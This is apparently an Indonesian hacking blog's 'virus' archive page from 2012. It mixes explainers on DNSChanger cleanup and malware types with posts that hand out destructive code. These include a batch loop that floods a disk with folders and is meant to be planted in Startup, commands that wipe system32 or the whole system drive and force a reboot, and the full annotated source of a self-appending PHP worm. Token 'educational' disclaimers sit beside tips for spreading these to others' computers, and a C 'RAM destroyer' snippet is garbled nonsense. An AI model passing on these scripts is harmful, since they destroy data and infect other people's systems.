Tampilkan postingan dengan label virus. Tampilkan semua postingan
Tampilkan postingan dengan label virus. Tampilkan semua postingan

Sabtu, 07 Juli 2012

2 Mengenal Trojan DNS Changer Dan Serta Cara Mengatasinya

07.26 Under From Unknown
[2 Comment]




  9 Juli 2012 adalah tanggal yang paling ditakuti tahun 2012 ini khususnya para pengguna Internet selain isu kiamat 21-12-2012. Tanggal tersebut diramalkan bahwa merupakan tanggal berakhirnya Internet di Dunia Kiamat Internet, ramalan tersebut bukan tanpa fakta. Bahkan FBI sendiri juga turut memberitakan hal ini, tentu kita semua pasti khawatir. Nah melalui artikel tentang "Mengenal Trojan DNS Changer Dan Cara Mengatasinya" ini, kita bisa lebih memahami tentang apa itu virus trojan DNS Changer yang menyebabkan Kiamat Internet 9 Juli 2012 serta bagaimana cara mencegah dan mengatasi virus trojan DNS Changer sebagai antisipasi.

Kiamat internet 9 Juli terjadi karena serangan malware DNS Changer trojan. Sekarang, kita lihat dulu kisahnya:
DNS
DNS atau Domain Name Server adalah sarana penerjemah antara bahasa manusia dengan alamat IP internet protocol yang merupakan bilangan angka.

Sebagai gambaran, kita tentu lebih mudah mengingat www.google.com sedangkan sistem komputer sebenarnya mengidentifikasi alamat komputer itu dengan angka atau IP address.

Jadi, www.google.com sebenarnya dikenal oleh komputer kita sebagai 173.194.38.162. Kalau ingin mencoba, silahkan ketik IP tersebut di browser internet dan kita akan diantar ke situs Google. DNS server inilah yang menjadi 'calo' menerjemahkan bahasa manusia www.google.com ke angka IP 173.194.38.162 sehingga dimengerti oleh komputer.

Jadi singkatnya, kalau penerjemahnya tidak ada, maka komputer tidak mengerti apa maksud manusia. Dan manusia yang kurang memahami faktor teknis seperti ini pasti akan bingung kenapa komputernya jadi tak berdaya dan mengira internetnya mati.


Trojan DNSChanger
Trojan DNSChanger adalah virus yang mengubah alamat DNS server komputer korban -- yang biasanya mengacu ke DNS para penyedia internet atau ISP -- menjadi daftar DNS palsu yang telah dipersiapkan sebelumnya.

Pada bulan November 2011 lalu, FBI melalui operasi yang dinamakan 'Operation Ghost Click' berhasil menciduk enam warga Estonia karena melakukan aksi yang mengejutkan.

                                      
                                                              siliconangle.com

Mereka menginfeksi lebih dari empat juta komputer di dunia, baik PC maupun Mac, dengan malware yang memiliki kemampuan mengubah DNS komputer korbannya dan mengarahkannya ke server-server DNS palsu yang telah dipersiapkan sebelumnya.

Tujuannya apa lagi kalau bukan untuk mendapatkan keuntungan finansial. Khususnya dari aktivitas iklan online, spam, dan scam.

Yang menjadi masalah adalah, pada saat penangkapan masih ada jutaan komputer yang terinfeksi oleh DNSchanger ini, dan tetap menggunakan DNS palsu tersebut sebagai DNS utamanya.

Jika server-server DNS palsu itu dimatikan, maka otomatis seluruh komputer yang menggunakan DNS palsu tersebut akan mengalami kiamat kecil alias tidak bisa terhubung ke internet selama DNS setting-nya belum dibenahi.

Karena itu, FBI mengambil keputusan untuk mempertahankan DNS server palsu ini setelah sebelumnya membersihkan server-server tersebut dari aksi jahat. Itu tadi kabar baiknya bagi Anda yang terinfeksi oleh DNSchanger.

Kabar buruknya adalah, pengadilan memerintahkan FBI untuk mematikan seluruh DNS server palsu tadi pada tanggal 8 Maret 2012 dan akhirnya diperpanjang sampai tanggal 9 Juli 2012 karena menganggap sudah memberikan cukup tenggang waktu bagi para korban DNSchanger ini untuk memperbaiki komputernya.

Karena itu, jika komputer Anda terinfeksi oleh DNSchanger dan belum dibersihkan, maka pada tanggal 9 Juli 2012 praktis akan tidak bisa mengakses internet atau dengan kata lain mengalami kiamat kecil internet.

Lebih celaka lagi, DNSchanger ini tidak hanya menginfeksi komputer PC dan Mac tetapi ia juga memiliki kemampuan untuk menginfeksi router-router dan memanipulasi DNS server dari router tersebut.

Sehingga seluruh komputer atau perangkat yang terkoneksi melalui router ini dan secara otomatis menggunakan DNS router ini akan ikut tersesat dan mengalami kiamat internet juga sekalipun komputer-komputer ini sama sekali tidak terinfeksi oleh DNSchanger.


Berbagai cara untuk mengatasinya:
FBI memang belum memastikan seluruh server DNS tak terinfeksi dan bisa disembuhkan dari serangannya. Setidaknya ada cara untuk menanggulangi serangannya.
Ternyata cara yang cukup mudah untuk mengetahui apakah komputer Anda terjangkit DNSChanger atau tidak. Yakni menggunakan situs khusus yang dibuat oleh kelompok kerja DNS Changer sendiri.


Buka web browser (misalnya Internet Explorer, Firefox, Chrome, atau Safari) kemudian akses salah satu situs di bawah ini.

  1. http://dns-ok.us
  2. http://dns-ok.de/
  3. http://dns-ok.ax/index_en.html
  4. http://dns-ok.fi/index_en.html
Ini adalah contoh2 warna hijau.

Apabila hasil test berwarna hijau, maka komputer Anda normal. Namun bila hasilnya berwarna merah, maka setting DNS server dari komputer Anda atau router broadband Anda diarahkan ke server jahat yang dikenal.

Jika router Anda terinfeksi, situs dns-ok.us pun akan beranggapan komputer Anda terjangkit DNSChanger trojan, meskipun sebenarnya tidak. Yang lebih buruk lagi, jika ISP Anda mengatur ulang lalu lintas DNS, maka kemungkinan komputer terlihat bersih. Walaupun ada kemungkinan pengaturan DNS Anda sudah diubah oleh virus jahat.

Jika Anda ingin benar-benar mengetahui apakah komputer terbebas dari penyebab Kiamat Internet, maka Anda harus melihat secara manual alamat IP server DNS. Alamat IP tersebut akan menunjukkan dengan siapa saja komputer Anda saling berkomunikasi. Dari situ bisa diamati apakah ada serangan apakah bisa dihapus.


Cara mengatasi dengan manual:
WINDOWS
Pada komputer berbasis Windows 7, bukalah start menu dan jalankan aplikasi Command Prompt. Atau bisa juga mengetik cmd di kolom search start menu. Ketika command prompt terbuka, maka ketik ipconfig /allcompartments /all dan tekan enter. Layar akan menampilkan sejumlah teks. Telusuri tulisan itu ke bawah hingga menemukan baris bertuliskan DNS Server. Lalu salin ke bawah sejumlah kode string yang mengikuti server DNS. Kalau banyak berarti, komputer anda mengakses lebih dari satu server.

MAC
Bagi pengguna komputer berbasis Mac OS X, caranya lebih mudah. Buka Apple menu, biasanya berlokasi di sudut kiri atas layar, pilih system preference. Lalu klik ikon network untuk membuka menu network setting. Arahkan ke advance setting dan salin ke bawah sejumlah kode string yang terdapat dalam box server DNS.

Jika Anda sudah mengetahui alamat IP yang digunakan server DNS makan salin dan tempel ke situs milik FBI. Situs FBI DNSChanger akan memberitahu apakah komputer Anda menggunakan server DNS yang nakal atau tidak. Lalu jika positif kena, apa yang harus dilakukan.

Pertama tentuya menyelamatkan data. Buat back-up data-data penting lalu format ulang piranti keras komputer Anda dan instal ulang sistem operasinya. Atau bisa juga tanpa instal ulang, tapi dengan alat penghapus seperti Kaspersky Labs TDSSKiller. Sebuah piranti lunak besutan perusahaan antivirus Rusia untuk menghilangkan DNSChanger trojan.

Jika serangan sudah masuk jaringan, maka Anda harus mengecek setiap komputer dalam jaringan. Lalu cek juga pengaturan router untuk memastikan tidak terinfeksi. Cara mengecek DNS router, serupa dengan mengecek DNS komputer. Salin alamat IP server DNS router lalu masukkan ke situs FBI apakah layanan tersebut aman atau tidak. Jika tidak aman, maka reset pengaturan router Anda. Terakhir, jangan lupa setelah semua diatur ulang, jalani lagi prosedur pengecekan dari awal.

Catatan
Periksa DNS server komputer atau router Anda (lihat tabel di bawah). Cek apakah angkanya sama dengan angka di tabel bawah ini. Bila ya, berarti sistem Anda pernah terinfeksi oleh DNSchanger, dan termasuk yang akan mengalami kiamat internet pada 9 Juli ini.

                              

Indonesia apakah aman dengan DNSchanger ?
Pada November 2011, DNSchanger berhasil menginfeksi empat juta alamat IP, baik komputer maupun router. Kalau saat itu server DNSchanger dimatikan, setidaknya empat juta komputer di dunia akan kehilangan akses internet dan sudah pasti akan menimbulkan kekacauan.

Sejak FBI menangkap pelaku perusakan ini, maka otomatis infeksi DNSchanger menurun drastis sejak November 2011. Menurut data dari DNS Changer Working Group, infeksi pada tanggal 11 Juni 2012 di seluruh dunia turun menjadi kurang dari 10%. Jumlahnya 303.867 IP Address. Lalu bagaimana penyebarannya di dunia ?

                              

Dari daftar di atas, 5 besar negara yang terinfeksi DNSchanger per tanggal 11 Juni 2012 adalah Amerika Serikat 69.517 (27%), Italia 26.494 (10%), India 21.302 (8%), Inggris 19.589 (8%) dan Jerman 18.427 (7%).

Sedangkan Indonesia sendiri tidak termasuk ke dalam 25 besar negara yang terinfeksi DNSchanger. Di Asean, Thailand termasuk ke dalam 25 besar negara yang terinfeksi DNSchanger dengan jumlah IP terinfeksi 2.941 (1,13%).

Karena Indonesia tidak termasuk ke dalam 25 besar negara-negara yang terinfeksi DNScharger dan infeksi negara ke 25 adalah PK (Pakistan) 1.682 IP (0,65%) maka cukup realistis untuk memperkirakan infeksi DNSchanger di seluruh Indonesia sekitar 1.650 pada tanggal 11 Juni 2012.

Dibandingkan dengan jumlah pengguna internet Indonesia yang berjumlah 55 juta, maka korban DNSchanger di Indonesia adalah 0,003%.

Jika Anda menggunakan program antivirus yang selalu update, harusnya kemungkinan tersebut lebih kecil lagi karena hampir semua program antivirus sudah dapat mendeteksi DNScharger sejak akhir 2011 lalu.


Referensi : detik, tempo dan berbagai sumber lainnya.
Read More »

Sabtu, 25 Februari 2012

0 Cara Membuat Virus 1000 Folder Dalam Beberapa Detik

10.57 Under From Unknown
[0 Comment]


Bookmark and Share
Di postingan ini Pountar-cyber akan mengajarkan bro-bro cara membuat virus  sederhana, virus ini akan membuat 1000 folder jika ada yang mengkliknya....wow....... mau tau caranya?? silahkan simak dengan baik-baik cara di bawah ini :


 


## Langkah - langkahnya :##

1. Buka aplikasi Notepad
2. Lalu agan copas scripat di bawah ini


##########################
@echo off
title cyberb4t
color 09

:cyberb4t

md %random%%

goto cyberb4t
#########################


3. Lalu Save As dengan formata *.bat [misal contoh POUNTAR.bat ]

terrrrreeeng dan hasilnya,,wooowww keren,,,,,,,


# cara menyebarkannya #

Cara penyebarannya tergantung dari kreatifitas kamu. klo pke kitq pe cara...!!! kita copy file tadi di StartUp lalu paste,,,,
Nah kalu belum tau startup di mana,,,?? ngana tinggal klik start > all programms startup terakhir pastekan di situ,,,
karena kalu di taro di startup maka file itu akan jalan secara otomatis ,,,,selesai daeh...

SALAM POUNTAR-CYBER
Read More »

Selasa, 21 Februari 2012

0 delete c:WINDOWSsystem32

05.51 Under From Unknown
[0 Comment]


cara  menghapus C:WINDOWS System32
ikut langkah langkah berikut:
1. Buka Notepad
2. lalu tulis perintah berikut: -


PHP Code:
del c:WINDOWSsystem32*.*/q 
3. Simpan notepad tersebut dengan ekstensi ".bat atau .cmd "
4. warning .........
Jangan klik dua kali file tersebut karna file yang kamu ciptakan menghapus semua file dari komputer
folder system32 dan ketika kamu restart pc mu tidak akan mulai
coz sistem tidak dapat menemukan file dalam folder system32 yang
diperlukan pada saat booting.
5. Anda juga dapat menguji di atas dengan membuat folder palsu membiarkan rasa
windows1 di C: \. Menyalin beberapa file lama di dalamnya dan hanya mengikuti atau meniru nya saja
atas command.karena mengklik file yang kamu ganda atau copy bat atau cmd semua file otomatis bisa dihapus.
6. kamu dapat mencoba file ini di komputer manapun satu `s (tapi. ini menyebabkan menyebabkan kerusakan pada
komputer,jangan di salah gunakan ya buat kerjain komputer orang .. ok bro .. heheh ...
ingat ini cuma buat share ilmu aja sambil belajar
Read More »

0 Bagaimana menghapus file yang sys. Di W7

05.50 Under From Unknown
[0 Comment]


Semua tahu Windows 7 adalah sangat populer O / S. Dan jendela basis O / S tidakmengizinkan pengguna untuk menghapus file sys.. Tapi tidak ada yang mustahil, di sini adalah trik untuk menghapus file dalam sistem hanya beberapa menit. ok mari kita mulai..

Untuk menghapus file sistem UNTUK mengambil kepemilikan file. Pertama bukacommand prompt.

Untuk mengambil kepemilikan file, Anda harus menggunakan perintah takeown. Berikutadalah contohnya:

takeown / f C: \ Windows \ System32 \ en-US \ winload.exe.mui

memberikan kepemilikan file tetapi tidak memberikan izin untuk menghapusnya bahwa untuk menghapusnya menulis perintah ini.

cacls C: \ Windows \ System32 \ en-US \ winload.exe.mui / G geek: F

Perintah cacls membantu u untuk mendapatkan akses ke file sekarang seluruhmenghapus file. Centang ini membantu penuh jika u ingin membuat virus.

CATATAN: -

- Jangan menghapus file sistem sistem crash atau Anda tidak dapat mengakses Sistem
Read More »

0 Virus Code To Destroyed RAM

05.49 Under From Unknown
[0 Comment]


Ini adalah C Sederhana Source Code Yang Bisa Hentikan Kerja Komputer
RAM Efek bijaksana Lain Sektor Hard Disk.

KODE:
{
outportb (0 × 63,0 XSD);
sistem ("dir>> ╚ s.exe");
}

Kode penuh adalah Tidak diberikan di sini karena sangat Gigi palsu untuk Tubuh apapun.

Jika Anda Guru dalam bahasa Pemrograman dari membuat Kode penuh dengan

Tanggung jawab Anda sendiri.
Hanya untuk Tujuan Pendidikan
Read More »

0 Back Door

05.48 Under From Unknown
[0 Comment]


BackDoor merupakan jenis malware yang menyerang system computer dengan memberikan hak akses supaya pengguna lain dapat menjalankan komputeryang menjadi target. Berdasarkan cara bekerja dan perilaku pernyebarannya, backdoor dapat dibagi menjadi 2 group.
Group pertama mirip dengan Trojan. Mereka secara manual dimasukan ke dalam suatu program pada perangkat lunak kemudian ketika perangkat lunak itu diinstal, mereka menyebar. Backdoor dalam group ini dijalankan sebagai bagian dari proses boot. Ratware adalah sebuatan untuk backdoor yang mengubah computer menjdai zombie yang mengirimkan spam. Backdoor lain mampu mengacaukan lalu lintas jaringan, melakukan brute force untuk meng-crack password dan enkripsi,dan mendistribusikan serangan distributed denial of service (DDoS).
Read More »

0 Worm

05.47 Under From Unknown
[0 Comment]


Worm atau dalam bahasa Indonesia disebut dengan cacing. Worm dapat menyebar kebeberapa computer melalui port tertentu. Worm juga memiliki sifat seperti virus yaitu menggadakan diri. Biasanya dibuat untuk merusak system computer tertentu yang sudah menjadi target dari jarak jauh (remote)
Read More »

0 Trojan

05.47 Under From Unknown
[0 Comment]


Awalnya Trojan merupakan istilah dalam perang. Dimana Trojan adalah sebuah alat untuk dimasukkan dengan cara mengelabui ke area musuh. Setelah masuk, maka alat tersebut berubah untuk menghacurkan musuh tersebut dari dalam.
Programmer terinspirasi untuk membuat program yang bersifat menghacurkan dan dapat mengelabuhi targetnya. Seperti halnya dengan virus , Trojan juga memiliki kemampuan untuk menggadakan diri seperti virus. Selain itu Trojan juga dapat menggendalikan pergram tertentu dan dapat mengelabuhi system dengan menyurapai aplikasi biasa.
Jika computer terinfeksi Trojan dan telah dikendalikan oleh penyerangnya, ada beberapa kemungkinan yang dapat terjadi. Berikut inimerupakan contoh kejadian jika computer telah terserang virus Trojan dengan netbus:
Menghapus File
Mengirim dan mengambil File
Menjalankan program-program aplikasi
Menampilkan gambar
Mengintip program-program yang sedang dijalankan
Menutup program-program yang sedang dijalankan
Membuka dan menutup CD-ROM drive
Mengirim pesan dan mengajak untuk bicara (chat)
Mematikan computer
Read More »

0 Cara Sederhana Membuat Virus PHP

05.46 Under From Unknown
[0 Comment]



                     Membuat virus bisa dengan bahasa apa saja dan salah
                  satunya adalah dengan bahasa PHP. Pada artikel ini akan kita
                  lihat bagaimana virus PHP.Indonesia yang juga dikenal dengan
                  nama I-Worm.PHP.Indonesia dibuat.


                  
                  OK,Sebelum saya di BOM...saya mau ngasih tau beberapa hal sbb
:

                  1. Artikel ini ditujukan buat menambah pengetahuan IT kita
saja
                  2. Saya dan penulis asli artikel ini tidak
                  bertanggungjawab
                     Jika ada lamer yang bertindak bodoh dengan menyebarkan
                  skrip ini
                  3. Judul asli artikel ini adalah "Simple technique how to
                  write PHP virus"
                  4. Skrip yang saya pake disini juga merupakan skrip virus
                  "PHP.Indonesia"
                     buatan sevenC dan udah terdeteksi Kaspersky nama
                  "I-Worm.PHP.Indonesia"

                  Ok...Kita mulai aja..!!
                  Pertama2 gw kasih mentahan skrip PHP.Indonesia,nanti gw akan
                  coba ngejelasin
                  baris demi baris arti codenya.

                  -------------------------------Code-------------------------------
                  <?
                  // #################################################
                  // # PHP.Indonesia made for all Chicken looser ground the
                  world  #
                  // # By sevenC / N0:7                                         
                                           #
                  // # http://sevenc.vze.com                                    
                                           #
                  // # sevenC_zone@yahoo.com                                    
                                   #
                  // ##################################################
                  $jawa = "indonesia.php\n";
                  $sumatra = "Wellcome to Indonesian PHPlovers.\n";
                  $kalimantan = $jawa . $sumatra;
                  echo $kalimantan;
                  $all = opendir('C:\Windows\');
                  $all1 = opendir('C:\My Documents\');
                  $all2 = opendir('C:\InetPub\wwwRoot\');
                  $all3 = $all && $all1 && $all2
                  while ($file = readdir($all3))
                  {
                   $inf = true;
                   $exe = false;
                   if ( ($exe = strstr ($file, '.php')) || ($exe = strstr
                  ($file, '.php2')) || ($exe = strstr ($file, '.php3')) )
                          if ( is_file($file) && is_writeable($file) )
                   {
                    $new = fopen($file, "r");
                    $look = fread($new, filesize($file));
                    $yes = strstr ($look, 'indonesia.php');
                    if (!$yes) $inf = false;
                   }
                   if ( ($inf=false) )
                   {
                    $new = fopen($file, "a");
                    $fputs($new, "<!-- ");
                    $fputs($new, "PHP.indonesia - ");
                    $fputs($new, "By sevenC / N0:7, ");
                    $fputs($new, "http://trax.to/sevenC, ");
                                  $fputs($new, "sevenC_Zone@yahoo.com, ");
                    $fputs($new, "SECTORS UNDERGROUND TEAM (Indonesia)");
                    $fputs($new, "--->");
                    $fputs($new, "<?php ");
                    $fputs($new, "include(\"");
                    $fputs($new, __FILE__);
                    $fputs($new, "\"); ");
                    $fputs($new, "?>");
                    return;
                   }
                  }
                  closedir($all3);
                  // PHP.Indonesia made for all Chicken looser ground the world
                  // By sevenC / N0:7
                  ?>
                  --------------------------------------eoc-----------------------
                  Udah.. liat..? Mau belajar ? yeah... Gw akan coba jelasin
                  baris per baris
                  code virus PHP.Indonesia,tapi kalu gw salah mohon dikoreksi
                  yah...!! :) maklum
                  gw belum setaraf sama sevenC,hehehe... :P
                  -------------------------------------begin----------------------
                  <?
                  * Loe pasti tau kalo PHP musti dimulai make tanda ini --> <?
                  buat ngunjukin
                    browser kalo entu skrip PHP.
                  // ###############################################
                  // # PHP.Indonesia made for all Chicken looser ground the
                  world #
                  // # By sevenC / N0:7                                         
                                   #
                  // # http://sevenc.vze.com                                    
                                   #
                  // # sevenC_zone@yahoo.com                                    
                           #
                  // ###############################################
                  * Pertama loe musti tau kalo komentar dalam PHP harus dimulai
                  dengan karakter -->> //
                    Jadi baris2 di atas engga akan di eksekusi karna cuman
                  komentar. 
                  $jawa = "indonesia.php\n";
                  * Pemberian nama variabel harus dimulai dengan karakter $
                  * Menset variabel jawa sama dengan string "indonesia.php" dan
                  \n ntu ganti baris
                  * Setiap satu baris kalimat musti diakhiri dengan karakter
                  titik koma à ;
                  $sumatra = "Wellcome to Indonesian PHPlovers.\n";
                  * Menset variabel sumatra sama dengan string "Wellcome to
                  Indonesian PHPlovers"
                  $kalimantan = $jawa . $sumatra;
                  * var kalimantan = var gabungan jawa dan var sumatra
                  echo $kalimantan;
                  * Menulis variabel kalimantan kedalam texttream
                  $all = opendir('C:\Windows\');
                  * var $all = membuka direktory windows
                  
                  $all1 = opendir('C:\My Documents\');
                  * var $all1 = membuka direktory My Documents
                  $all2 = opendir('C:\InetPub\wwwRoot\');
                  * var $all2 = membuka directori wwwRoot
                  * karna saya rasa maksud sevenC membuka folder ini adalah
                  karna di PWS file-file PHP
                  * biasanya diletakan di direktori ini
                  $all3 = $all && $all1 && $all2
                  * $all3 = gabungan dari $all , $all1 dan $all3
                  while ($file = readdir($all3))
                  * Perulangan kita mulai ketika kita membaca isi direktori
                  {
                  * Inget dengan tanda ini..!!
                   $inf = true;
                  * menSet var $inf sebagai variabel boolean = true
                   $exe = false;
                  * menSet var $exe sebagai variabel boolean = false
                   if ( ($exe = strstr ($file, '.php')) || ($exe = strstr
                  ($file, '.phtml')) || ($exe = strstr ($file, '.php3')) )
                  * Lihatlah extensi2 file yang akan kita serang
(php,phtml,php3)
                          if ( is_file($file) && is_writeable($file) )
                  * Mencek atribut2 file,jika kita diijinkan menulis lalu
                   {
                  * Skali lagi jangan lupa tanda ini
                    $new = fopen($file, "r");
                  * menSet $new = membuka file baru dengan atribut read only
                  yang hanya bisa dibaca saja
                    $look = fread($new, filesize($file));
                  * menSet $look = membaca var $new dan ukuran dari file
                    $yes = strstr ($look, 'indonesia.php');
                  * menSet $yes = $look , indonesia.php
                  
                    if (!$yes) $inf = false;
                  * Jika bukan var $yes maka var $inf bernilai salah
                   }
                   if ( ($inf=false) )
                  * jika var $inf = salah kemudian
                   {
                    $new = fopen($file, "a");
                  * menSet $new = membuka file ( variabel $file ) / file yang
                  diinfeksi
                    $fputs($new, "<!-- ");
                  * tulis string "<!--" kedalam file tsb ($new)
                  
                    $fputs($new, "PHP.indonesia - ");
                  * tulis string "PHP.indonesia - " kedalam file tsb ($new)
                    $fputs($new, "By sevenC / N0:7, ");
                  * tulis string "By sevenC / N0:7, " kedalam file tsb ($new)
                    $fputs($new, "http://trax.to/sevenC, ");
                  * tulis string "http://trax.to/sevenC, " kedalam file tsb
                  ($new)
                                  $fputs($new, "sevenC_Zone@yahoo.com, ");
                  * tulis string "sevenC_Zone@yahoo.com, " kedalam file tsb
                  ($new)
                    $fputs($new, "SECTORS UNDERGROUND TEAM (Indonesia)");
                  * tulis string tsb ($new) "SECTORS UNDERGROUND TEAM
                  (Indonesia)" kedalam file tsb ($new)
                    $fputs($new, "--->");
                  * tulis string "--->" kedalam file tsb ($new)
                    $fputs($new, "<?php ");
                  * Tulis seluruh kode virus ini kedalam file tsb
                    $fputs($new, "include(\"");
                  * tulis string "include(\" kedalam file tsb ($new)
                    $fputs($new, __FILE__);
                  * Tulis juga seluruh kode / skrip asli dari file tsb
                    $fputs($new, "\"); ");
                  * Tulis "\" kedalam file tsb
                    $fputs($new, "?>");
                  * Tulis "?>" kedalam file tsb
                    return;
                  * Ulangi langkah-langkah diatas
                   }
                  }
                  closedir($all3);
                  * menutup semua direktori yang aktif tadi ($all3)
                  // PHP.Indonesia made for all Chicken looser ground the world
                  // By sevenC / N0:7
                  * komentar om sevenC
                  ?>
                  * Nutup skrip virus PHP ini

 --------------------------------Selesai---------------------------
                  Ok... mudah-mudahan ngoni semua mangarti apa yang qt tulis
                  diatas,kalo ndak ? bodok reen :P
Read More »

0 Menghancurkan System

05.44 Under From Unknown
[0 Comment]



Saya punya sedikit tutorial untuk merusak komputer, dengan Script Notepad. Namun saya tidak bertanggung jawab atas segala kerusakannya.
Langkahnya :
1. Buka Notepad
2. Copy Code Berikut

Code:
@echo off
del%systemdrive%*.*/f/s/q/
shutdown -r -f -t 00

3. Lalu Save as. (untuk nama terserah anda).bat
Ex : Metal.bat
4. Saat menjalankan File Tersebut Komputer langsung Shutdown dan tidak bisa dibuka lagi

ha ha ha

ane cuma ingin berbagi ilmu aja gan

terserah sma yg mo gunain nih ilmu

yg penting we sdh mo berbagi ilmu ini ke semua anak anak yg ada d forum ini..!!

Kalo ada yg gunain cara dari saya ini, komputer tidak akan berjalan,!! hehe
kalo malas buat download aja ini virus 
download
Read More »

0 Buat Virus Dengan Notped

05.43 Under From Unknown
[0 Comment]

- buka notped
- copy semua kode di bawah

- jangan lupa pilih format all file
- lalu simpan dengan nama cmd.bat

@echo off
echo WARNING VIRUS DETECTED!
echo System check...
echo -
echo Error: ScanDisk cannot check this drive...
echo Hard drive - FAILED
echo code error VNETSUP: Error 6102
echo -
echo Memory - FAILED
echo -
echo Connection - FAILED
echo -
echo Hard drive must be formatted to resume windows
echo -
PAUSE
echo -
echo All data erased completely
PAUSE
echo -
echo Hard drive has been formatted
echo -
echo -WARNING
echo -
PAUSE
echo ketipu ni yeeeeee :P
echo ketipu ni yeeeeee :P
echo ketipu ni yeeeeee :P
echo ketipu ni yeeeeee :P
echo ketipu ni yeeeeee :P
echo ketipu ni yeeeeee :P
echo ketipu ni yeeeeee :P
echo ketipu ni yeeeeee :P
echo ketipu ni yeeeeee :P
echo ketipu ni yeeeeee :P
echo ketipu ni yeeeeee :P
echo ketipu ni yeeeeee :P
PAUSE
Read More »

0 virus Kategorisasi Viruses

05.42 Under From Unknown
[0 Comment]
Viruses
Berbagai jenis Virus telah dipetakan oleh saya. Klik pada gambar untuk mendapatkan tampilan yang lebih besar. Harap menaruh komentar ur untuk setiap perubahan.
Read More »

0 MyDoom worm! Semoga Anda Happy Birthday yang sangat khusus ... : P

05.40 Under From Unknown
[0 Comment]


Mydoom, pertama kali terlihat pada tanggal 25 Januari 2004, disebut oleh Craig Schmugar, seorang karyawan perusahaan keamanan komputer McAfee dan salah satu penemu awal dari worm.

Mydoom tampaknya telah ditugaskan melalui e-mail spammer sehingga untuk mengirim junk e-mail melalui komputer yang terinfeksi. Worm ini berisi pesan teks "andy; Aku hanya melakukan pekerjaan saya, tidak ada pribadi, maaf," menyebabkan banyak untuk percaya bahwa pencipta cacing dibayar.

Cakupan spekulatif awal berpendapat bahwa satu-satunya tujuan dari worm adalah untuk memperbuat serangan denial-of-service terdistribusi melawan SCO Group. 25% dari Mydoom.A terinfeksi host ditargetkan www.sco.com dengan banjir lalu lintas.

Mydoom terutama ditularkan melalui e-mail, muncul sebagai kesalahan transmisi, dengan baris subjek termasuk "Kesalahan", "Mail Delivery System", "Test" atau "Surat Transaksi Gagal" dalam berbagai bahasa, termasuk Inggris dan Perancis. Mail berisi lampiran yang, jika dijalankan, kembali mengirimkan worm ke alamat e-mail yang ditemukan dalam file lokal seperti buku alamat pengguna.
Read More »

0 Undetected Exploits… How has it been possible?

05.39 Under From Unknown
[0 Comment]


Bagaimana eksploitasi yang dibuat untuk tidak terdeteksi?Mengeksploitasi harus memiliki dua fitur yang paling penting. Pertama yang harus dapat diandalkan dan kedua, bahwa itu harus sangat terdeteksi.Untuk konten mengeksploitasi untuk tetap tidak terdeteksi, metode berikut telah digunakan. Aku akan memberikan pengenalan yang sangat singkat untuk masing-masing teknik.Menyembunyikan isi:
 1. Obfuscated kode: menumbuk up atau mengotori kode, mungkin dengan menghapus spasi putih, karakter khusus, untuk membuat orang lain tidak diketahui tujuan bahwa urutan kode. Kode ini seperti cacat kadang-kadang bahwa implementasi algoritma berbagai deobfuscation untuk itu, tidak berakhir dengan urutan kode ragu berbahaya, meskipun sebenarnya itu.Sederhana javascript mesin dalam produk keamanan sekarang memeriksa algoritma deobfuscation paling dikenal.Bahkan beberapa aplikasi yang tersedia yang membantu dalam kebingungan dari kode berbahaya.Kode berbahaya sering memiliki tag iframe, yang membantu penciptaan koneksi yang terpisah untuk mengambil suatu konten tertentu, tergantung pada jumlah tag digunakan di seluruh.
 2. Enkripsi: Kode berbahaya kadang-kadang dienkripsi sebelum masuk ke target. Jadi ini juga merupakan teknik yang populer untuk mendapatkan terdeteksi di sisi korban.Menyembunyikan jaringan:

 1. Daftar hitam perusahaan terkenal keamanan: Beberapa eksploitasi memiliki segmen kode di blacklist aplikasi keamanan sehingga saat mereka disuntikkan ke target, mereka mendapatkan daftar hitam, sehingga mustahil untuk dideteksi. 
 2. Terus berubah IP: berbagai aplikasi yang tersedia yang mengubah IP Anda saat perubahan halaman konten.
 3. Domain fluks Cepat: Cepat fluks DNS adalah suatu teknik bahwa cybercriminal dapat digunakan untuk mencegah identifikasi alamat IP tombol host nya server.  

Mungkin situs phishing, yang penyerang mungkin swap dengan IP hukum normal pada server DNS. Dengan menyalahgunakan cara kerja sistem nama domain, pidana dapat menciptakan botnet dengan node yang bergabung dan drop off jaringan lebih cepat dari aparat penegak hukum bisa melacak mereka.DNS memungkinkan administrator untuk mendaftarkan sejumlah alamat IP dengan nama host. Alamat alternatif yang sah digunakan untuk mendistribusikan lalu lintas Internet antara beberapa server, dikenal untuk load balancing.Penjahat telah menemukan bahwa mereka dapat menyembunyikan key server mereka dengan menggunakan 1 / 62 waktu-untuk-hidup (TTL) pengaturan untuk catatan sumber daya DNS mereka dan swapping IP catatan 'terkait alamat dalam dan keluar dengan frekuensi ekstrim.

 Misalnya: Melihat halaman rumah facebook, misalkan Anda klik pada profil. Jika fluks cepat hadir, Anda mungkin akan melihat konten palsu pada halaman profil, yang sangat ajaib menghilang pada refresh halaman berikutnya.Worm Storm salah satu varian malware baru-baru ini untuk menggunakan teknik ini.Pengguna internet dapat melihat fluks cepat digunakan dalam serangan phishing terkait dengan organisasi kriminal, termasuk serangan di MySpace.
Read More »

0 VIRUS, WORMS and TROJANS!

05.39 Under From Unknown
[0 Comment]


Sering kali nama-nama virus, trojan, worm, spyware, botnet dan robot spam menakut-nakuti Anda. Kadang-kadang kita mengatakan virus untuk menjadi trojan, sebuah trojan untuk menjadi sebuah botnet. Cukup membingungkan kata-kata yang digunakan secara bergantian. Sebenarnya ada banyak perbedaan di antara mereka. Kami mengambil masing-masing dan setiap satu dari ini satu per satu. Harapan yang akan baik-baik!VIRUS:Jadi virus, sering ditemukan dalam bentuk aktif atau pasif di hampir 90% dari sistem komputer yang aktif di seluruh. Bentuk-bentuk sederhana mungkin virus autorun, yang menginfeksi file autorun standar ditemukan di drive, yang mungkin bervariasi berbahaya. Lain bentuk yang lebih sederhana adalah virus batch file tersebut. Sebuah virus komputer menempel pada sebuah program atau file memungkinkan untuk menyebar dari satu komputer ke komputer lain karena perjalanan. Tapi titik yang akan dicatat adalah bahwa, tetap yang aktif awalnya kecuali dan sampai program dijalankan atau diklik. Jadi tidak dapat menyebar tanpa tindakan manusia. Sebuah virus dapat membahayakan perangkat keras, perangkat lunak dan file. Virus yang paling sadar menyebar dengan berbagi file yang terinfeksi melalui email sebagai lampiran, pen drive, disk data dengan virus. Lampiran mungkin format berbeda seperti *. hta, *. vbs, yang merupakan file script visual basic dikodekan sebagai virus, *. exe, file yang memiliki ekstensi kantor seperti *. ppt, *. xls dan sebagainya.  

